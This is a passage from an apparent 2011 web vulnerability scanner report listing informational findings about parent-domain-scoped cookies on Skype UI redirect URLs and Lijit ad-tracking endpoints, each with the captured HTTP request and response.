Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170213:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 21:03:33 GMT; path=/; domain=.skype.com;
Location: https://support.skype.com/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


10.74. http://ui.skype.com/ui/0/5.5.0.114./en/upgrade  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.114./en/upgrade

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.114./en/upgrade HTTP/1.1
User-Agent: Skype Upgrade
Host: ui.skype.com

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:04:44 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:TM=1315170284:TS=1315170284:TZ=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 21:04:44 GMT; path=/; domain=.skype.com;
Location: http://download.skype.com/SkypeSetupFull.exe
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


10.75. http://ui.skype.com/ui/0/5.5.0.114./en/upgraded  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.114./en/upgraded

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.114./en/upgraded HTTP/1.1
User-Agent: Skype. 5.5
Host: ui.skype.com
Pragma: no-cache

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:58:15 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:TM=1315159095:TS=1315159095:TZ=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 17:58:15 GMT; path=/; domain=.skype.com;
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


10.76. http://ui.skype.com/ui/0/5.5.0.115./en/go/apps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.115./en/go/apps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.115./en/go/apps HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:08:54 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:08:54 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/apps
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


10.77. http://ui.skype.com/ui/0/5.5.0.115./en/go/prices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.115./en/go/prices

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.115./en/go/prices HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:14:10 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:14:10 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/prices
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


10.78. http://ui.skype.com/ui/0/5.5.0.115./en/go/share  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.115./en/go/share

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.115./en/go/share HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:13:37 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:13:37 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/share?SkypeName=&FriendEmailAddr_1=&FriendEmailAddr_2=&FriendEmailAddr_3=&FriendEmailAddr_4=&FriendEmailAddr_5=&FriendEmailAddr_6=&FriendName_1=&FriendName_2=&FriendName_3=&FriendName_4=&FriendName_5=&FriendName_6=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


10.79. http://ui.skype.com/ui/0/5.5.0.115./en/go/subscriptions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.115./en/go/subscriptions

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.115./en/go/subscriptions?country= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:27:02 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:E70B9EF1770AF398=:LC=en-us:TM=1315171622:TS=1315171562:TZ=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:27:02 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/subscriptions?cm_mmc=Skype-_-Dynamic_Content-_-Subscriptions-_-Generic4
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


10.80. http://vap1den1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap1den1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_base_href&referer=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_base_href&cb=8f19e12354 HTTP/1.1
Host: vap1den1.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.2226068
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315190052; OACAP=785.11; OASCAP=785.11

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315190056; expires=Wed, 05-Oct-2011 02:34:16 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[1509702]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B1509702%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[7851509702]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B7851509702%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=1; expires=Tue, 04-Sep-2012 02:34:16 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[1509702]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B1509702%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[7851509702]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B7851509702%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=1; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[1509702]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B1509702%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[7851509702]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B7851509702%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c; expires=Tue, 04-Sep-2012 02:34:16 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.1315190056_354.deleted_785354.deleted_63.deleted_78563.deleted_1509702.deleted_7851509702.deleted; expires=Wed, 05-Oct-2011 02:34:16 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.12_354.deleted_785354.deleted_63.deleted_78563.deleted_1509702.deleted_7851509702.deleted; expires=Tue, 04-Sep-2012 02:34:16 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.12_354.deleted_785354.deleted_63.deleted_78563.deleted_1509702.deleted_7851509702.deleted; path=/; domain=.lijit.com
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.81. http://vap1iad1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap1iad1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_anchor_href&referer=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_anchor_href&cb=f46cf88e15 HTTP/1.1
Host: vap1iad1.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.1264765
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315189969; OACAP=785.7; OASCAP=785.7; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315190041; expires=Wed, 05-Oct-2011 02:34:01 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=-553; expires=Tue, 04-Sep-2012 02:34:01 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=-553; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:00 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c; expires=Tue, 04-Sep-2012 02:34:01 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.1315190041_354.deleted_785354.deleted_63.deleted_78563.deleted; expires=Wed, 05-Oct-2011 02:34:01 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.554_354.0_785354.0_63.0_78563.0; expires=Tue, 04-Sep-2012 02:34:01 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.554_354.0_785354.0_63.0_78563.0; path=/; domain=.lijit.com
Content-Length: 43
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.82. http://vap1iad2.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap1iad2.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_doc_open&referer=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_doc_open&cb=1de5903c89 HTTP/1.1
Host: vap1iad2.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.4080622
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315189866; OACAP=785.3; OASCAP=785.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315189871; expires=Wed, 05-Oct-2011 02:31:11 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=1; expires=Tue, 04-Sep-2012 02:31:11 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=1; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:31:10 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_reader=9a524261efe1e1588396f48f16471b3c; expires=Tue, 04-Sep-2012 02:31:11 GMT; path=/; domain=.lijit.com
Set-Cookie: OABLOCK=785.deleted_354.deleted_785354.deleted; expires=Wed, 05-Oct-2011 02:31:11 GMT; path=/; domain=.lijit.com
Set-Cookie: OACAP=785.3_354.0_785354.0; expires=Tue, 04-Sep-2012 02:31:11 GMT; path=/; domain=.lijit.com
Set-Cookie: OASCAP=785.3_354.0_785354.0; path=/; domain=.lijit.com
Content-Length: 43
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.83. http://vap1sfo1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap1sfo1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_doc_writeln&referer=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_doc_writeln&cb=bc930de640 HTTP/1.1
Host: vap1sfo1.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.9388239
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315189871; OACAP=785.4; OASCAP=785.4

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:22 GMT
